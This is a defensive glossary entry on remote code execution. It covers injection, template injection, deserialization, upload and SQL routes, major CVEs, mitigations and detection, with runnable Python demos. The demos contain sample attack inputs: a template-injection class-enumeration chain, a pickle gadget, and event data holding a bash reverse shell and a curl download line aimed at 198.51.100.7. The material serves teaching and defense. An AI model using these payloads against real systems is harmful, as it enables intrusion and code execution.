Vulnerability Classes Glossary

RCE - Remote Code Execution

Remote Code Execution (RCE) is the most critical class of vulnerabilities and allows an attacker to execute arbitrary code on the target system—without physical access. RCE results from vulnerabilities such as buffer overflows, deserialization errors, command injection, server-side template injection (SSTI), SQL injection with file write permissions, or path traversal in combination with file upload. CVSS score: typically 9.0–10.0 (Critical). RCE serves as the entry point for ransomware, lateral movement, and APT attacks.

Remote Code Execution is the attacker's "Holy Grail" and an administrator's worst nightmare. A successful RCE gives an attacker control over a system without ever being physically present. Log4Shell (CVE-2021-44228) demonstrated in 2021 how a single RCE in a widely used library put hundreds of thousands of systems worldwide at risk, with mass exploitation starting within hours of disclosure.

Sources of RCE

1. Command Injection

Typical CVSS: 9.8 (Critical) when the injection point is reachable without authentication. User input is passed to the OS shell (or becomes part of a command line), so shell metacharacters such as ; | & $( ) are interpreted as commands.

Insecure implementations:

  • Python: subprocess.run(..., shell=True) or os.system() with unvalidated input
  • PHP: shell_exec()/passthru()/exec()/system() with user input
  • Node.js: child_process.exec()/execSync() with interpolated parameters (the shell-spawning variants)
  • Java: Runtime.getRuntime().exec() with string concatenation, especially when the command is wrapped in "sh -c" (which reintroduces the shell)

Secure alternative:

  • Parameterized commands: pass an argument list (argv) to the OS without shell interpretation, so metacharacters are never parsed
  • Input allowlist: accept only the characters the feature actually needs (e.g., letters, digits, dot and hyphen for a hostname) and reject everything else rather than trying to escape it
  • Mind argument injection: an argv list stops shell metacharacters but not a value starting with "-" that the called program reads as an option; validate the value and end option parsing with "--" where the tool supports it
  • Avoid the shell entirely where a library call (DNS resolver, file API) does the same job as the CLI tool
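The three rules above side by side, as an added example that is not part of the original glossary entry: a hypothetical "list a directory" feature implemented once with shell=True and once with an argv list, plus a hostname allowlist for a hypothetical "ping a host" feature. The attacker input is constructed; the directory listing really runs ls, so the difference is observable.

```python
import re
import subprocess

# Hypothetical feature: the application lists a directory chosen by the user.
# Both helpers run "ls -l <path>"; only the first one goes through /bin/sh.

# Constructed attacker input: a shell separator followed by a second command.
MALICIOUS_PATH = "; echo INJECTED"


def list_dir_vulnerable(path: str) -> str:
    """Insecure: user input is interpolated into a command STRING.
    /bin/sh parses the ';' and runs the attacker's command as well."""
    result = subprocess.run(f"ls -l {path}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def list_dir_safe(path: str) -> str:
    """Secure: argv LIST, no shell. The whole user string reaches ls as one
    argument; ';' is just a character in a (nonexistent) file name.
    '--' ends option parsing, so a value like '-R' cannot become a flag."""
    result = subprocess.run(["ls", "-l", "--", path],
                            capture_output=True, text=True)
    return result.stdout


# Allowlist for a second hypothetical feature (ping a host). The pattern
# describes what a hostname IS; anything else is rejected before it gets
# near a command. Labels start with a letter or digit, so a leading '-'
# (which an argv list alone does not protect against) is rejected too.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"                                          # total length
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"           # first label
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"   # more labels
)


def is_valid_hostname(value: str) -> bool:
    return HOSTNAME_RE.match(value) is not None


def ping_args(host: str) -> list:
    """Build the argv for 'ping -c 1 <host>' only after allowlisting."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    print("shell=True  :", repr(list_dir_vulnerable(MALICIOUS_PATH)[-40:]))
    print("argv list   :", repr(list_dir_safe(MALICIOUS_PATH)))
    print("allowlist   :", is_valid_hostname("example.com"),
          is_valid_hostname("example.com; id"))
```

With the shell variant the output ends in "INJECTED"; with the argv list ls merely complains on stderr that the file "; echo INJECTED" does not exist. The allowlist is deliberately strict: it rejects valid-but-unneeded inputs (IPv6 literals, trailing dots) rather than trying to enumerate dangerous characters.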

2. Server-Side Template Injection (SSTI)

Template engine processes user input as template code.

  • Detection test: if {{7*7}} comes back as "49" in the response, the input was evaluated as template code (Jinja2, Twig and others; ${7*7} and #{7*7} probe further engines)
  • Typical root cause: the template source is built by concatenating user input (Template("Hello " + name)) instead of passing the input as a render variable
  • Worst case: the expression language reaches object internals (in Jinja2 via __class__, __mro__, __subclasses__()) and from there subprocess or os, i.e. RCE

Protection:

  • Never render user input as template source code
  • Only pass user input into templates as variables (the template string itself stays a constant)
  • Use a sandboxed environment as defense in depth (Jinja2: jinja2.sandbox.SandboxedEnvironment); a sandbox restricts what an expression can reach, but it still evaluates user-supplied template code, so it is no substitute for the first two rules
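The detection probe, the vulnerable pattern, the correct pattern and the sandbox's limits in one runnable Jinja2 script. This is an added example, not code from the glossary; the two attacker inputs are constructed, and the greeting template is a hypothetical stand-in for any page that echoes a user-supplied name.

```python
from typing import Tuple

from jinja2 import Environment, Template
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed attacker inputs.
PROBE = "{{ 7 * 7 }}"                                      # the detection test
CHAIN = "{{ ''.__class__.__mro__[1].__subclasses__() }}"   # first step of an RCE chain


def greet_vulnerable(name: str) -> str:
    """Insecure: user input becomes part of the template SOURCE, so Jinja2
    evaluates any expression it contains."""
    return Template("Hello, " + name + "!").render()


def greet_safe(name: str) -> str:
    """Secure: the template source is a constant and user input is passed as
    a VARIABLE. Braces in the value are data, and autoescape handles HTML."""
    env = Environment(autoescape=True)
    return env.from_string("Hello, {{ name }}!").render(name=name)


def greet_sandboxed(name: str) -> Tuple[bool, str]:
    """Same insecure pattern as greet_vulnerable, but in a SandboxedEnvironment.
    The sandbox refuses access to private/dunder attributes (SecurityError),
    yet still evaluates '7 * 7': it limits the damage, it does not fix the bug."""
    env = SandboxedEnvironment()
    try:
        return True, env.from_string("Hello, " + name + "!").render()
    except SecurityError as exc:
        return False, str(exc)


if __name__ == "__main__":
    print("vulnerable :", greet_vulnerable(PROBE))          # Hello, 49!
    print("safe       :", greet_safe(PROBE))                # Hello, {{ 7 * 7 }}!
    print("sandboxed  :", greet_sandboxed(PROBE))           # (True, 'Hello, 49!')
    print("sandboxed  :", greet_sandboxed(CHAIN)[0])        # False
    print("class list :", greet_vulnerable(CHAIN)[:60], "...")
```

The CHAIN input rendered through greet_vulnerable returns the full list of loaded classes, which is exactly the enumeration step an attacker uses to find subprocess.Popen; the sandbox stops that at the first dunder attribute, but a probe like {{7*7}} still returns 49, which is why the sandbox alone does not make the pattern safe.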

3. Deserialization

Objects are reconstructed from binary/text formats, and the serialized data itself dictates which classes are instantiated and which methods run:

  • Java: ObjectInputStream.readObject() without an ObjectInputFilter (JEP 290)
  • PHP: unserialize() without an allowed_classes restriction
  • Python: pickle.loads() on untrusted data
  • The attacker supplies a crafted serialized object that chains classes already on the classpath into a "gadget chain"
  • Result: attacker-chosen methods (typically ending in a command execution sink) run during deserialization, before the application ever sees the object

Protection:

  • Prefer data-only formats (JSON, Protocol Buffers) over native object serialization, and validate the decoded data against the expected schema
  • Java: ObjectInputFilter with an allowlist of permitted classes (Java 9+, backported to 8u121)
  • PHP: unserialize($data, ['allowed_classes' => false]) or an explicit class list if unserialize cannot be avoided
  • Never apply pickle/unserialize to external data; an HMAC over the blob only helps as long as the signing key never leaks
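A pickle gadget, the allowlisting Unpickler from the Python documentation, and the JSON-plus-validation alternative, added here as an example that is not part of the glossary. The gadget calls a constructed, harmless sink function instead of os.system so the effect is observable without running anything; the Profile record and its field names are hypothetical.

```python
import io
import json
import pickle
from dataclasses import dataclass, asdict
from typing import Any, Tuple

# Constructed stand-in for os.system: records what a deserialised gadget
# manages to call, so the demo is deterministic and harmless.
EXECUTED: list = []


def sink(command: str) -> str:
    EXECUTED.append(command)
    return f"executed: {command}"


class Gadget:
    """Attacker-controlled class. pickle calls the callable returned by
    __reduce__ with the given arguments WHILE loading, before the application
    sees the result. A real gadget would name os.system or subprocess.Popen."""

    def __reduce__(self):
        return (sink, ("id > /tmp/pwned",))


# Constructed payloads: a forged "session" blob, and two benign ones.
PAYLOAD = pickle.dumps(Gadget())
LEGIT_DICT_BLOB = pickle.dumps({"k": [1, 2, 3]})
LEGIT_RANGE_BLOB = pickle.dumps(range(3))       # references builtins.range


def unsafe_load(blob: bytes) -> Any:
    """Insecure: pickle.loads on external data. The return value is whatever
    the gadget's callable returned; the side effect has already happened."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist every global the stream may reference (pattern from the
    Python docs). Anything outside it, such as our sink or os.system, fails."""

    ALLOWED = {("builtins", "range"), ("builtins", "set"), ("builtins", "frozenset")}

    def find_class(self, module: str, name: str):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def restricted_load(blob: bytes) -> Tuple[bool, Any]:
    try:
        return True, RestrictedUnpickler(io.BytesIO(blob)).load()
    except pickle.UnpicklingError as exc:
        return False, str(exc)


# The better answer: a data-only format plus explicit validation.
@dataclass
class Profile:
    user_id: int
    display_name: str


def profile_to_json(profile: Profile) -> str:
    return json.dumps(asdict(profile))


def profile_from_json(text: str) -> Profile:
    data = json.loads(text)          # can only yield dicts, lists and scalars
    if not isinstance(data, dict) or set(data) != {"user_id", "display_name"}:
        raise ValueError("unexpected fields")
    if not isinstance(data["user_id"], int) or isinstance(data["user_id"], bool):
        raise ValueError("user_id must be an int")
    if not isinstance(data["display_name"], str):
        raise ValueError("display_name must be a string")
    return Profile(**data)


if __name__ == "__main__":
    print("pickle.loads  :", unsafe_load(PAYLOAD), EXECUTED)
    print("restricted    :", restricted_load(PAYLOAD))
    print("restricted ok :", restricted_load(LEGIT_RANGE_BLOB))
    print("json          :", profile_from_json('{"user_id": 7, "display_name": "alice"}'))
```

Note that the restricted loader still parses the whole stream and instantiates plain containers; it blocks the global lookup that gadget chains depend on, which is the same idea as Java's ObjectInputFilter. The JSON path cannot instantiate arbitrary classes at all, so validation reduces to checking field names and types.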

4. File Upload + Path Traversal

  • Attacker uploads an executable file (webshell), often under a harmless-looking name such as avatar.jpg.php or with a valid image header in front of the PHP code (polyglot)
  • The file lands in a directory the web server maps to a script handler (or a path traversal in the file name puts it there), and the next request to it executes the upload
  • Common: PHP webshells disguised as images

Protection:

  • File type validation by content (magic bytes), not just by extension or client-supplied Content-Type; magic bytes alone are spoofable (a PNG header followed by PHP code passes), so this check is necessary but not sufficient
  • Store uploads outside the web root under a server-generated random name with an extension derived from the validated type; never reuse the client's file name (no path traversal, no .php)
  • Serve downloads through a handler with Content-Disposition: attachment and X-Content-Type-Options: nosniff (no inline rendering)
  • Allowlist of types: only image/jpeg, image/png, application/pdf

5. SQL Injection → RCE

  • MySQL: LOAD_FILE() reads files, SELECT ... INTO OUTFILE writes them, e.g. a webshell into a writable web root (only where secure_file_priv permits it)
  • MSSQL: xp_cmdshell executes OS commands directly
  • Prerequisite: high database privileges (FILE privilege or sysadmin role) and, for the file route, a known writable path under the web root

Protection:

  • Prepared statements against the SQL injection itself
  • Minimal DB privileges: no FILE privilege for application users; set secure_file_priv to a dedicated directory or to NULL
  • MSSQL: keep xp_cmdshell disabled and keep the application login out of the sysadmin role

Known RCE CVEs (Reference)

Log4Shell (CVE-2021-44228)

  • Software: Apache Log4j 2.0-beta9 through 2.14.1
  • CVSS: 10.0 (Critical)
  • Method: JNDI lookup (${jndi:ldap://...}) evaluated inside log messages
  • Payload principle: any logged, attacker-controlled string (User-Agent, username, ...) makes the server fetch a remote class via LDAP/RMI
  • Impact: a large share of Java applications affected, often through transitive dependencies
  • Fix: upgrade to 2.15.0 or later (2.17.0+ after the follow-up CVEs CVE-2021-45046 and CVE-2021-45105); the stopgap log4j2.formatMsgNoLookups=true exists only for 2.10–2.14.1 and was later shown to be insufficient in some configurations

EternalBlue (CVE-2017-0144)

  • Software: Windows SMBv1 server (srv.sys), all supported Windows versions at the time
  • CVSS: 8.1 (High) in CVSS v3 per NVD, since AC:H; 9.3 in CVSS v2
  • Method: buffer overflow in the kernel SMBv1 driver, reachable unauthenticated on TCP/445
  • Exploited by: WannaCry, NotPetya ransomware (2017)
  • Fix: apply MS17-010, disable SMBv1, and block TCP/445 at the perimeter

Spring4Shell (CVE-2022-22965)

  • Software: Spring Framework 5.3.0–5.3.17 and 5.2.0–5.2.19 (exploited in practice on JDK 9+ with a WAR deployed on Tomcat)
  • CVSS: 9.8 (Critical)
  • Method: data binding lets request parameters reach class.module.classLoader properties; abused to write a JSP webshell via Tomcat's AccessLogValve
  • Fix: upgrade to Spring 5.3.18+ or 5.2.20+ (Spring Boot 2.6.6 / 2.5.12)

ProxyLogon (CVE-2021-26855)

  • Software: Microsoft Exchange Server 2013, 2016 and 2019 (on-premises)
  • CVSS: 9.8 (Critical) per NVD
  • Method: pre-authentication SSRF that bypasses authentication, chained with CVE-2021-27065 (arbitrary file write) for code execution as SYSTEM
  • Exploited by: Hafnium (APT), then numerous ransomware groups
  • Fix: March 2021 out-of-band Exchange security updates

Confluence OGNL Injection (CVE-2022-26134)

  • Software: Atlassian Confluence Server and Data Center (all versions before the fixed releases)
  • CVSS: 9.8 (Critical)
  • Method: OGNL expression injected via the request URI path, evaluated server-side without authentication → code execution
  • Fix: upgrade to 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 or 7.18.1

Text4Shell (CVE-2022-42889)

  • Software: Apache Commons Text 1.5–1.9 (fixed in 1.10.0)
  • CVSS: 9.8 (Critical)
  • Method: StringSubstitutor interpolation of untrusted input; the default lookups ${script:javascript:...}, ${dns:...} and ${url:...} execute code or reach out to the network
  • Similar to Log4Shell but with a far smaller scope: the application must explicitly pass user input through StringSubstitutor, and script execution needs a JSR-223 engine on the classpath (Nashorn was removed in JDK 15)

Mitigations against RCE

Development (Shift-Left)

  • Parameterized commands instead of shell interpolation
  • Deserialization: JSON/Protobuf instead of native formats
  • Template engines: User input only as variables, never as source code
  • SAST in CI/CD: CodeQL, Semgrep (detects command injection patterns)
  • Dependency check: Snyk, Dependabot, OWASP Dependency Check

Infrastructure

  • Patch management: critical CVEs within 7 days, prioritized by EPSS and known exploitation (CISA KEV)
  • WAF: OWASP CRS blocks many known RCE payloads (SQLi, SSTI, command injection), but only as a compensating control; encoding and obfuscation bypasses are routine, so it buys time for patching, nothing more
  • Least privilege: web servers and application processes without root privileges (dedicated non-root users)
  • Container security: read-only filesystem, no privileged mode, dropped capabilities
  • Network segmentation and egress filtering: the web tier reaches the database only through the application tier, and server processes cannot open arbitrary outbound connections (this blocks reverse shells and JNDI/LDAP class loading)

Detection

  • EDR: anomalous process hierarchies (web server or application runtime spawning sh/bash/cmd.exe/powershell.exe)
  • SIEM rule: unexpected outbound connections from server processes (reverse shells, JNDI/LDAP callbacks, download cradles)
  • File integrity monitoring: new or modified scripts in the web root → immediate alert
  • Vulnerability scanner (Nessus, Qualys): weekly scan, plus an ad-hoc scan whenever a critical RCE is published
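The first detection above (a web server spawning a shell) as a rule run over process-creation events, added here as an example and not part of the glossary. The six JSON events, the host names, the 198.51.100.7 callback address and the baseline of known-good parent/child pairs are constructed; the parent and child process lists are the kind an EDR or SIEM rule would carry and should be tuned per environment.

```python
import json
from typing import Dict, List, Optional

# Server processes that have no business launching an interactive shell.
WEB_PARENTS = {"nginx", "apache2", "httpd", "php-fpm", "java", "tomcat",
               "node", "gunicorn", "uwsgi", "w3wp.exe"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh"}
INTERPRETERS = {"python", "python3", "perl", "ruby"}
DOWNLOADERS = {"curl", "wget", "certutil.exe", "bitsadmin.exe"}
# Known-good pairs for this (hypothetical) environment, e.g. image conversion.
BASELINE = {("php-fpm", "convert"), ("java", "git")}

# Constructed process-creation events, one JSON object per line, as an EDR
# or auditd forwarder might deliver them.
EVENTS = """\
{"ts": "2024-05-01T10:00:01Z", "host": "web01", "parent": "nginx", "child": "nginx", "cmdline": "nginx: worker process", "user": "www-data"}
{"ts": "2024-05-01T10:00:05Z", "host": "web01", "parent": "php-fpm", "child": "convert", "cmdline": "convert in.png out.jpg", "user": "www-data"}
{"ts": "2024-05-01T10:00:09Z", "host": "web01", "parent": "php-fpm", "child": "sh", "cmdline": "sh -c id", "user": "www-data"}
{"ts": "2024-05-01T10:00:12Z", "host": "app02", "parent": "java", "child": "bash", "cmdline": "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1", "user": "tomcat"}
{"ts": "2024-05-01T10:00:15Z", "host": "app02", "parent": "java", "child": "curl", "cmdline": "curl -s http://198.51.100.7/x.sh", "user": "tomcat"}
{"ts": "2024-05-01T10:00:20Z", "host": "db01", "parent": "sshd", "child": "bash", "cmdline": "-bash", "user": "admin"}
"""


def classify(event: Dict) -> Optional[str]:
    """Return a severity for a suspicious parent/child pair, or None."""
    parent, child = event["parent"], event["child"]
    if parent not in WEB_PARENTS:
        return None                      # an admin's sshd -> bash is normal
    if child == parent or (parent, child) in BASELINE:
        return None                      # worker fork or approved helper
    if child in SHELLS or child in INTERPRETERS:
        return "high"                    # classic webshell / reverse shell
    if child in DOWNLOADERS:
        return "medium"                  # possible second-stage download
    return "low"                         # unexpected child: review, don't page


def detect(lines: str) -> List[Dict]:
    alerts = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        severity = classify(event)
        if severity is not None:
            alerts.append({"severity": severity, "ts": event["ts"],
                           "host": event["host"], "user": event["user"],
                           "parent": event["parent"], "child": event["child"],
                           "cmdline": event["cmdline"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(f"[{alert['severity']:6}] {alert['host']} {alert['parent']} -> "
              f"{alert['child']}: {alert['cmdline']}")
```

Three of the six events fire: php-fpm spawning sh, java spawning a bash reverse shell, and java calling curl (the download cradle that typically follows). The nginx worker fork and the baselined convert call stay quiet, and so does the interactive bash under sshd on db01, which is why the rule keys on the parent rather than on the shell alone.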

Response

  • Incident response plan: confirmed RCE → immediate network isolation of the host; preserve memory and disk images before rebuilding
  • Forensics: retain logs for at least 90 days (when was initial access? which credentials were present on the host?)
  • Backup validation: can data be restored after the compromise, from backups the attacker could not reach?
  • Communication: GDPR reporting obligation (Art. 33, within 72 hours) if personal data was breached via the RCE

CVSS rating for RCE (example)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Score: 9.8 (Critical)

Metric    Value      Meaning
AV:N      Network    Reachable over the network
AC:L      Low        No special conditions; reliably exploitable
PR:N      None       No authentication required
UI:N      None       No user interaction required
S:U       Unchanged  Impact stays within the vulnerable component
C/I/A:H   High       Complete loss of confidentiality, integrity and availability